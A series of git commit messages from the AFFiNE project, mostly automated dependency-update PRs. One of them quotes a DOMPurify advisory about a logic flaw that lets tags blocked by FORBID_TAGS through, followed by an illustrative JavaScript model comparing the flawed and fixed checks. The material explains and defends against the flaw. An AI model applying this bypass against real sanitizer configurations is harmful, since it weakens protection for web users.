| [eslint-plugin-oxlint](https://redirect.github.com/oxc-project/eslint-plugin-oxlint) | [`1.58.0` → `1.60.0`](https://renovatebot.com/diffs/npm/eslint-plugin-oxlint/1.58.0/1.60.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/eslint-plugin-oxlint/1.60.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/eslint-plugin-oxlint/1.58.0/1.60.0?slim=true) |

---

### Release Notes

<details>
<summary>oxc-project/eslint-plugin-oxlint (eslint-plugin-oxlint)</summary>

### [`v1.60.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.60.0)

[Compare Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.59.0...v1.60.0)

*No significant changes*

##### [View changes on GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.59.0...v1.60.0)

### [`v1.59.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.59.0)

[Compare Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.58.0...v1.59.0)

*No significant changes*

##### [View changes on GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.58.0...v1.59.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-04-20 19:18:29 +08:00
renovate[bot] cc79fa3c6d chore: bump up opentelemetry (#14844)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [@opentelemetry/api](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/api) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`1.9.0` → `1.9.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2fapi/1.9.0/1.9.1) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fapi/1.9.1?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fapi/1.9.0/1.9.1?slim=true) |
| [@opentelemetry/core](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-core) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.6.0` → `2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fcore/2.6.0/2.7.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fcore/2.7.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fcore/2.6.0/2.7.0?slim=true) |
| [@opentelemetry/exporter-prometheus](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-exporter-prometheus) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.213.0` → `^0.215.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-prometheus/0.213.0/0.215.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fexporter-prometheus/0.215.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fexporter-prometheus/0.213.0/0.215.0?slim=true) |
| [@opentelemetry/exporter-zipkin](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-exporter-zipkin) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.6.0` → `2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-zipkin/2.6.0/2.7.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fexporter-zipkin/2.7.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fexporter-zipkin/2.6.0/2.7.0?slim=true) |
| [@opentelemetry/instrumentation](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.213.0` → `^0.215.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation/0.213.0/0.215.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation/0.215.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation/0.213.0/0.215.0?slim=true) |
| [@opentelemetry/instrumentation-graphql](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-graphql#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-graphql)) | [`^0.61.0` → `^0.63.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-graphql/0.61.0/0.63.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-graphql/0.63.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-graphql/0.61.0/0.63.0?slim=true) |
| [@opentelemetry/instrumentation-http](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation-http) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.213.0` → `^0.215.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-http/0.213.0/0.215.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-http/0.215.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-http/0.213.0/0.215.0?slim=true) |
| [@opentelemetry/instrumentation-ioredis](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-ioredis#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-ioredis)) | [`^0.61.0` → `^0.63.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-ioredis/0.61.0/0.63.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-ioredis/0.63.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-ioredis/0.61.0/0.63.0?slim=true) |
| [@opentelemetry/instrumentation-nestjs-core](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-nestjs-core#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-nestjs-core)) | [`^0.59.0` → `^0.61.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-nestjs-core/0.59.0/0.61.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-nestjs-core/0.61.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-nestjs-core/0.59.0/0.61.0?slim=true) |
| [@opentelemetry/instrumentation-socket.io](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-socket.io#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-socket.io)) | [`^0.60.0` → `^0.62.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-socket.io/0.60.0/0.62.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-socket.io/0.62.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-socket.io/0.60.0/0.62.0?slim=true) |
| [@opentelemetry/resources](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-resources) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.6.0` → `2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fresources/2.6.0/2.7.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fresources/2.7.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fresources/2.6.0/2.7.0?slim=true) |
| [@opentelemetry/sdk-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/sdk-metrics) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.6.0` → `2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-metrics/2.6.0/2.7.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-metrics/2.7.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-metrics/2.6.0/2.7.0?slim=true) |
| [@opentelemetry/sdk-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-sdk-node) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.213.0` → `^0.215.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-node/0.213.0/0.215.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-node/0.215.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-node/0.213.0/0.215.0?slim=true) |
| [@opentelemetry/sdk-trace-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-sdk-trace-node) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.6.0` → `2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-trace-node/2.6.0/2.7.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-trace-node/2.7.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-trace-node/2.6.0/2.7.0?slim=true) |

---

### Release Notes

<details>
<summary>open-telemetry/opentelemetry-js (@opentelemetry/api)</summary>

### [`v1.9.1`](https://redirect.github.com/open-telemetry/opentelemetry-js/blob/HEAD/CHANGELOG.md#191)

[Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/v1.9.0...v1.9.1)

##### 🐛 (Bug Fix)

- fix: avoid grpc types dependency
  [#3551](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3551)
  [@flarna](https://redirect.github.com/flarna)
- fix(otlp-proto-exporter-base): Match Accept header with Content-Type
  in the proto exporter
  [#3562](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3562)
  [@scheler](https://redirect.github.com/scheler)
- fix: include tracestate in export
  [#3569](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3569)
  [@flarna](https://redirect.github.com/flarna)

##### 🏠 (Internal)

- chore: fix cross project links and missing implicitly exported types
  [#3533](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3533)
  [@legendecas](https://redirect.github.com/legendecas)
- feat(sdk-metrics): add exponential histogram mapping functions
  [#3504](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3504)
  [@mwear](https://redirect.github.com/mwear)

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib (@opentelemetry/instrumentation-graphql)</summary>

### [`v0.63.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0630-2026-04-17)

[Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/ed97091c9890dd18e52759f2ea98e9d7593b3ae4...bd017c86bcdf369d7bc1b490e455f95b25385779)

##### Features

- **deps:** update deps matching '@opentelemetry/\*'
  ([#3479](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3479))
  ([8891261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/8891261cb590efcb661bd9f8afec4d1adf885ad8))

### [`v0.62.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0620-2026-03-25)

[Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/39f08c313dc4d929c110ab7c43771c3cdbf8aa4c...ed97091c9890dd18e52759f2ea98e9d7593b3ae4)

##### Features

- **deps:** update deps matching '@opentelemetry/\*'
  ([#3450](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3450))
  ([c8df394](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c8df394f02d68ae48a79a50258682c09dac13b8b))

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib (@opentelemetry/instrumentation-ioredis)</summary>

### [`v0.63.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0630-2026-04-17)

[Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/ed97091c9890dd18e52759f2ea98e9d7593b3ae4...bd017c86bcdf369d7bc1b490e455f95b25385779)

##### Features

- **deps:** update deps matching '@opentelemetry/\*'
  ([#3479](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3479))
  ([8891261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/8891261cb590efcb661bd9f8afec4d1adf885ad8))

##### Bug Fixes

- **redis-common:** expand redaction to include ACL, CONFIG, PSETEX,
  GETSET
  ([#3472](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3472))
  ([39193ca](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/39193cac4124eedc9e8fa5ae16ba960b5ab7a36b))

##### Dependencies

- The following workspace dependencies were updated
  - dependencies
    - [@opentelemetry/redis-common](https://redirect.github.com/opentelemetry/redis-common)
      bumped from ^0.38.2 to ^0.38.3
  - devDependencies
    - [@opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
      bumped from ^0.61.0 to ^0.62.0

### [`v0.62.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0620-2026-03-25)

[Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/39f08c313dc4d929c110ab7c43771c3cdbf8aa4c...ed97091c9890dd18e52759f2ea98e9d7593b3ae4)

##### Features

- **deps:** update deps matching '@opentelemetry/\*'
  ([#3450](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3450))
  ([c8df394](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c8df394f02d68ae48a79a50258682c09dac13b8b))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
    - [@opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
      bumped from ^0.60.0 to ^0.61.0

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib (@opentelemetry/instrumentation-nestjs-core)</summary>

### [`v0.61.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0610-2026-04-17)

[Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/ed97091c9890dd18e52759f2ea98e9d7593b3ae4...bd017c86bcdf369d7bc1b490e455f95b25385779)

##### Features

- **deps:** update deps matching '@opentelemetry/\*'
  ([#3479](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3479))
  ([8891261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/8891261cb590efcb661bd9f8afec4d1adf885ad8))

### [`v0.60.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0600-2026-03-25)

[Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/39f08c313dc4d929c110ab7c43771c3cdbf8aa4c...ed97091c9890dd18e52759f2ea98e9d7593b3ae4)

##### Features

- **deps:** update deps matching '@opentelemetry/\*'
  ([#3450](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3450))
  ([c8df394](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c8df394f02d68ae48a79a50258682c09dac13b8b))

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib (@opentelemetry/instrumentation-socket.io)</summary>

### [`v0.62.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0620-2026-04-17)

[Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/ed97091c9890dd18e52759f2ea98e9d7593b3ae4...bd017c86bcdf369d7bc1b490e455f95b25385779)

##### Features

- **deps:** update deps matching '@opentelemetry/\*'
  ([#3479](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3479))
  ([8891261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/8891261cb590efcb661bd9f8afec4d1adf885ad8))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
    - [@opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
      bumped from ^0.61.0 to ^0.62.0

### [`v0.61.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0610-2026-03-25)

[Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/39f08c313dc4d929c110ab7c43771c3cdbf8aa4c...ed97091c9890dd18e52759f2ea98e9d7593b3ae4)

##### Features

- **deps:** update deps matching '@opentelemetry/\*'
  ([#3450](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3450))
  ([c8df394](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c8df394f02d68ae48a79a50258682c09dac13b8b))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
    - [@opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
      bumped from ^0.60.0 to ^0.61.0

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-04-19 16:20:32 +08:00
Whitewater 3428ac478e chore: split i18n and bs-docs dirty checks in typecheck workflow (#14849)
## Summary

Split generated-file validation in the `typecheck` workflow so i18n
outputs and BS docs outputs are checked separately.

This fixes a misleading CI failure message: previously, CI could fail
due to i18n-generated changes like
`packages/frontend/i18n/src/i18n.gen.ts`, but only suggested running
`yarn typecheck && yarn affine bs-docs build`, which does not regenerate
those files.

## Changes

- validate i18n-generated changes immediately after `yarn affine
@affine/i18n build`
- keep ignoring `packages/frontend/i18n/src/i18n-completenesses.json` in
CI as before
- leave `yarn typecheck` as a separate step
- make the BS docs step only check for changes introduced by `yarn
affine bs-docs build`

## Result

CI now gives the correct remediation command depending on which
generated files are out of date:
- i18n issues: `yarn affine @affine/i18n build`
- docs/typecheck issues: `yarn typecheck && yarn affine bs-docs build`

## Testing

- verified the updated workflow YAML parses successfully


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Chores**
* Enhanced build validation for internationalization code generation to
ensure generated changes are properly committed before proceeding. The
validation now occurs immediately after code generation runs, providing
faster feedback during the build process.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-19 02:12:00 +08:00
Saurabh Pardeshi 0009f91d2a feat(editor): add "Copy as Markdown" option in context & export menus (#14705)
- Allow users to select text and copy it as Markdown via the context
menu
- Add "Copy as Markdown" under Export menu to copy entire document to
clipboard

Fixes #12983

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Added "Copy as Markdown" to the toolbar clipboard More menu for
selected content.
* Added "Copy as Markdown" to the page export menu to copy entire pages
as Markdown.

* **Behavior**
* Export flow now returns success/failure so the UI shows a dedicated
success or error notification for clipboard exports.

* **Localization**
  * Added strings for "Copy as Markdown" and "Copied as Markdown".
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: Whitewater <me@waterwater.moe>
Co-authored-by: lawvs <18554747+lawvs@users.noreply.github.com>
2026-04-18 20:39:20 +08:00
renovate[bot] f7d0f1d5ae chore: bump up Node.js to v22.22.2 (#14836)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [node](https://nodejs.org) ([source](https://redirect.github.com/nodejs/node)) | patch | `22.22.1` → `22.22.2` |

---

### Release Notes

<details>
<summary>nodejs/node (node)</summary>

### [`v22.22.2`](https://redirect.github.com/nodejs/node/compare/v22.22.1...v22.22.2)

[Compare
Source](https://redirect.github.com/nodejs/node/compare/v22.22.1...v22.22.2)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-04-17 23:59:24 +08:00
renovate[bot] 0849b342fa chore: bump up dompurify version to v3.4.0 [SECURITY] (#14833)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [dompurify](https://redirect.github.com/cure53/DOMPurify) | [`3.3.3` → `3.4.0`](https://renovatebot.com/diffs/npm/dompurify/3.3.3/3.4.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/dompurify/3.4.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/dompurify/3.3.3/3.4.0?slim=true) |

### GitHub Vulnerability Alerts

#### [GHSA-39q2-94rc-95cp](https://redirect.github.com/cure53/DOMPurify/security/advisories/GHSA-39q2-94rc-95cp)

## Summary
In `src/purify.ts:1117-1123`, `ADD_TAGS` as a function (via
`EXTRA_ELEMENT_HANDLING.tagCheck`) bypasses `FORBID_TAGS` due to
short-circuit evaluation.

The condition:
```
!(tagCheck(tagName)) && (!ALLOWED_TAGS[tagName] || FORBID_TAGS[tagName])
```
When `tagCheck(tagName)` returns `true`, the entire condition is `false`
and the element is kept — `FORBID_TAGS[tagName]` is never evaluated.

## Inconsistency
This contradicts the attribute-side pattern at line 1214 where
`FORBID_ATTR` explicitly wins first:
```
if (FORBID_ATTR[lcName]) { continue; }
```
For tags, FORBID should also take precedence over ADD.

## Impact
Applications using both `ADD_TAGS` as a function and `FORBID_TAGS`
simultaneously get unexpected behavior — forbidden tags are allowed
through. Config-dependent but a genuine logic inconsistency.

## Suggested Fix
Check `FORBID_TAGS` before `tagCheck`:
```
if (FORBID_TAGS[tagName]) { /* remove */ }
else if (tagCheck(tagName) || ALLOWED_TAGS[tagName]) { /* keep */ }
```

## Affected Version
v3.3.3 (commit 883ac15)

##### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N`

---

### Release Notes

<details>
<summary>cure53/DOMPurify (dompurify)</summary>

### [`v3.4.0`](https://redirect.github.com/cure53/DOMPurify/releases/tag/3.4.0): DOMPurify 3.4.0

[Compare
Source](https://redirect.github.com/cure53/DOMPurify/compare/3.3.3...3.4.0)

**Most relevant changes:**

- Fixed a problem with `FORBID_TAGS` not winning over `ADD_TAGS`, thanks
[@kodareef5](https://redirect.github.com/kodareef5)
- Fixed several minor problems and typos regarding MathML attributes,
thanks [@DavidOliver](https://redirect.github.com/DavidOliver)
- Fixed `ADD_ATTR`/`ADD_TAGS` function leaking into subsequent
array-based calls, thanks
[@1Jesper1](https://redirect.github.com/1Jesper1)
- Fixed a missing `SAFE_FOR_TEMPLATES` scrub in `RETURN_DOM` path,
thanks [@bencalif](https://redirect.github.com/bencalif)
- Fixed a prototype pollution via `CUSTOM_ELEMENT_HANDLING`, thanks
[@trace37labs](https://redirect.github.com/trace37labs)
- Fixed an issue with `ADD_TAGS` function form bypassing `FORBID_TAGS`,
thanks [@eddieran](https://redirect.github.com/eddieran)
- Fixed an issue with `ADD_ATTR` predicates skipping URI validation,
thanks [@christos-eth](https://redirect.github.com/christos-eth)
- Fixed an issue with `USE_PROFILES` prototype pollution, thanks
[@christos-eth](https://redirect.github.com/christos-eth)
- Fixed an issue leading to possible mXSS via Re-Contextualization,
thanks
[@researchatfluidattacks](https://redirect.github.com/researchatfluidattacks)
and others
- Fixed a problem with the type definition patcher after Node version
bump
- Fixed freezing BS runs by reducing the tested browsers array
- Bumped several dependencies where possible
- Added needed files for OpenSSF scorecard checks

**Published Advisories are here:**

<https://github.com/cure53/DOMPurify/security/advisories?state=published>

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-04-16 19:53:00 +08:00
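
The short-circuit ordering described in GHSA-39q2-94rc-95cp above, as an added example (a stand-alone model written for this page, not DOMPurify source and not part of the commit): it evaluates the quoted pre-fix condition beside the suggested fix and lists which `FORBID_TAGS` entries an `ADD_TAGS` predicate re-admits. The function names, the `buildConfig` shape and the sample config are assumptions constructed for illustration.

```javascript
// Model of the tag-filter decision quoted in the advisory.
// Constructed for illustration; this is not DOMPurify's own code.

// Turn an array of tag names into a prototype-free lookup map.
function toLookup(names) {
  const map = Object.create(null);
  for (const name of names) map[name.toLowerCase()] = true;
  return map;
}

// Build the three inputs the quoted condition reads (hypothetical helper).
function buildConfig({ allowed = [], forbid = [], addTags = null }) {
  return {
    ALLOWED_TAGS: toLookup(allowed),
    FORBID_TAGS: toLookup(forbid),
    // ADD_TAGS in function form; when absent it never admits anything.
    tagCheck: typeof addTags === 'function' ? addTags : () => false,
  };
}

// Pre-fix ordering, as quoted: once tagCheck() returns true the whole
// expression is false, so FORBID_TAGS is never consulted.
function isRemovedBeforeFix(tagName, cfg) {
  return Boolean(
    !cfg.tagCheck(tagName) &&
      (!cfg.ALLOWED_TAGS[tagName] || cfg.FORBID_TAGS[tagName])
  );
}

// Suggested-fix ordering: FORBID_TAGS is checked first and always wins.
function isRemovedAfterFix(tagName, cfg) {
  if (cfg.FORBID_TAGS[tagName]) return true;
  return !(cfg.tagCheck(tagName) || cfg.ALLOWED_TAGS[tagName]);
}

// Config audit: which forbidden tags survive under a given decision function?
function forbiddenTagsReadmitted(cfg, isRemoved = isRemovedBeforeFix) {
  return Object.keys(cfg.FORBID_TAGS)
    .filter((tag) => !isRemoved(tag, cfg))
    .sort();
}

// Side-by-side verdicts for a list of tag names.
function compare(tags, cfg) {
  return tags.map((tag) => ({
    tag,
    keptBeforeFix: !isRemovedBeforeFix(tag, cfg),
    keptAfterFix: !isRemovedAfterFix(tag, cfg),
  }));
}

// Constructed sample config: the predicate admits any custom element
// (a name containing a hyphen) while the deny-list names one of them.
const sampleConfig = buildConfig({
  allowed: ['p', 'a', 'b'],
  forbid: ['style', 'x-embed'],
  addTags: (tag) => tag.includes('-'),
});

console.table(
  compare(['p', 'style', 'x-card', 'x-embed', 'script'], sampleConfig)
);
console.log(
  'FORBID_TAGS entries re-admitted before the fix:',
  forbiddenTagsReadmitted(sampleConfig)
);
```

Running the audit over an application's own `FORBID_TAGS` list and `ADD_TAGS` predicate shows whether its configuration depended on the pre-3.4.0 ordering.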
renovate[bot] dc3b95c886 chore: bump up Rust crate rand to v0.9.3 [SECURITY] (#14832)
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [rand](https://rust-random.github.io/book) ([source](https://redirect.github.com/rust-random/rand)) | dependencies | patch | `0.9.1` → `0.9.3` |
| [rand](https://rust-random.github.io/book) ([source](https://redirect.github.com/rust-random/rand)) | workspace.dependencies | patch | `0.9.2` → `0.9.3` |

### GitHub Vulnerability Alerts

#### [GHSA-cq8v-f236-94qc](https://redirect.github.com/rust-random/rand/pull/1763)

It has been reported (by @lopopolo) that the `rand` library is
